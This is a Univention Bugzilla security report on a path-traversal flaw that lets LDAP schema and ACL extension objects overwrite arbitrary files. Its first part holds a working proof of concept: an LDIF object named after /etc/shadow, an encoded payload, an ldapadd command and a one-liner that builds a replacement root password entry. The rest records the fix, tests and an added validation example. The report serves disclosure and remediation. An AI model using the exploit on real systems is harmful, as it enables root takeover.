Univention Bugzilla – Bug 41780
univentionLDAPSchemaFilename=/../../../../../etc/shadow,cn=ldapschema,cn=univention
Last modified: 2021-06-23 07:29:08 CEST
Creating the following object allows any file in the filesystem to be overwritten:

~# cat schema.ldif
dn: univentionLDAPSchemaFilename=/../../../../../etc/shadow,cn=ldapschema,cn=univention,dc=acl,dc=local
cn: foo
objectClass: univentionLDAPExtensionSchema
univentionLDAPSchemaData:: QlpoOTFBWSZTWcfIJZQAADbfgCAQBAH/8Dfp7NAOm97gIAB1GAPUAAAGgDTI0yaGGjIGIDIAGhoA
 0BYCMGmKakPFwKkOawoe9LGtCYbL7wRMLBaABVA5Zg0p5GrRHZB+GKkxxl05I43OBswAqwUDry9S
 jRKhw6QIRt0oEftbctTZDgPr6LHBLZFUTyS/Qfi7kinChIY+QSyg
univentionLDAPSchemaFilename: /../../../../../etc/shadow
univentionLDAPSchemaActive: TRUE
objectClass: univentionObjectMetadata
univentionOwnedByPackageVersion: 2
univentionOwnedByPackage: foo

~# ldapadd -D uid=Administrator,cn=users,$ldap_base -w univention < schema.ldif

The same also goes for settings/ldapacl.

To generate the file content use the following command:

echo 'root:$6$5cAInBgG$7rdZuEujGK1QFoprcNspXsXHsymW3Txp0kDyHFsE.omI.3T0xek3KIneFPZ99Z8dwZnZ2I2O/Tk8x4mNNGSE4.:16965:0:99999:7:::' | python -c "import bz2,sys; sys.stdout.write(bz2.compress(sys.stdin.read()).encode('base64'))"
This issue has been filed against UCS 4.1. The maintenance with bug and security fixes for UCS 4.1 ended on the 5th of April 2018. Customers still on UCS 4.1 are encouraged to update to UCS 4.3. Please contact your partner or Univention for any questions. If this issue still occurs in newer UCS versions, please use "Clone this bug" or simply reopen the issue. In this case please provide detailed information on how this issue is affecting you.
The affected listener is management/univention-ldap/listener/ldap_extension.py but its implementation is in base/univention-lib/python/ldap_extension.py.
I added a test case for the issues, which is currently set to skipped.

ucs-test (9.0.2-48)
394a75192f69 | Bug #41780: Add 71_udm-settings/52_secure_filename_validation.py

The test case tests all combinations:
* create/modify/remove ACL/schema objects with ../ and / paths.
* no files are created in different paths than allowed
* if the old files are removed when renaming an object from a valid name to an invalid name
* if no file is removed when removing an acl/schema object
Basedir restriction and filename validation have been added.

univention-lib (8.0.0-10)
7141c0851292 | Bug #41780: Merge branch 'fbest/41780-schema-filename-injection' into 4.4-0
7cca0ecf0f39 | YAML Bug #41780
78683b480a0e | Bug #41780: PEP 8
54f395162bfb | Bug #41780: limit LDAP ACL's and Schema files to base directory
85cf9162e282 | Bug #41780: fix ldap filter escaping

ucs-test (9.0.2-53)
7141c0851292 | Bug #41780: Merge branch 'fbest/41780-schema-filename-injection' into 4.4-0
4ffe8b1c9c47 | Bug #41780: Extend 71_udm-settings/52_secure_filename_validation.py
394a75192f69 | Bug #41780: Add 71_udm-settings/52_secure_filename_validation.py

univention-lib.yaml
7141c0851292 | Bug #41780: Merge branch 'fbest/41780-schema-filename-injection' into 4.4-0
7cca0ecf0f39 | YAML Bug #41780
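As an added illustration of the two mitigations the commits above name (restricting extension files to a base directory and escaping the filename before it is used in an LDAP filter), the following is example code written for this page, not Univention's univention-lib implementation. BASE_DIR is a constructed placeholder rather than the directory UCS writes to, and the escape table follows RFC 4515, the same mapping python-ldap's ldap.filter.escape_filter_chars applies, implemented inline so the example has no dependencies.

```python
"""Filename validation for LDAP extension objects (added example)."""
import os
import re

# Constructed placeholder for the directory extension files are written to;
# the directory UCS actually uses is not part of this example.
BASE_DIR = "/var/lib/example-ldap/local-schema"

# Allow-list for the raw attribute value: exactly one path component made of
# letters, digits, '_', '.', '-' that does not start with a dot. This alone
# rejects '/', '..', NUL, whitespace, newlines and empty names.
_NAME_RE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*")

# RFC 4515 escaping for values embedded in an LDAP search filter.
_FILTER_ESCAPES = {
    "\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00",
}


class InvalidFilename(ValueError):
    """Raised when an LDAP-supplied filename must not be used on disk."""


def validate_filename(filename, base_dir=BASE_DIR):
    """Return the absolute on-disk path below base_dir for a supplied name.

    Two independent checks: the allow-list on the raw value, and a
    canonical-path check that the joined, normalised path still lies
    directly inside base_dir (defence in depth if the regex is ever loosened).
    """
    if not isinstance(filename, str) or not _NAME_RE.fullmatch(filename):
        raise InvalidFilename("filename %r is not a plain file name" % (filename,))
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.dirname(target) != base:
        raise InvalidFilename("filename %r escapes %s" % (filename, base))
    return target


def is_valid_filename(filename, base_dir=BASE_DIR):
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        validate_filename(filename, base_dir)
    except InvalidFilename:
        return False
    return True


def escape_filter_chars(value):
    """Escape a value before embedding it in an LDAP search filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def extension_filter(filename):
    """Search filter for the schema object that owns a given filename.

    Escaping keeps a value such as 'foo)(objectClass=*' inside the equality
    assertion instead of letting it change the filter's structure.
    """
    return "(univentionLDAPSchemaFilename=%s)" % escape_filter_chars(filename)


if __name__ == "__main__":
    # The filename from the report above and a few neighbours are rejected;
    # a plain name is accepted and mapped to its on-disk path.
    for name in ("foo.schema", "/../../../../../etc/shadow", "../etc/shadow",
                 "sub/dir.schema", ".hidden", ""):
        verdict = "ok" if is_valid_filename(name) else "rejected"
        print("%-28r -> %s" % (name, verdict))
    print(extension_filter("foo)(objectClass=*"))
```

The on-disk check compares the parent of the resolved target with the resolved base directory, so a symlink planted inside the base directory cannot redirect a write elsewhere either; both the regex and the path check must pass before a file is touched.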
* Code review: Ok
* Jenkins Tests: Ok
* Advisory: Ok
<http://errata.software-univention.de/ucs/4.4/125.html>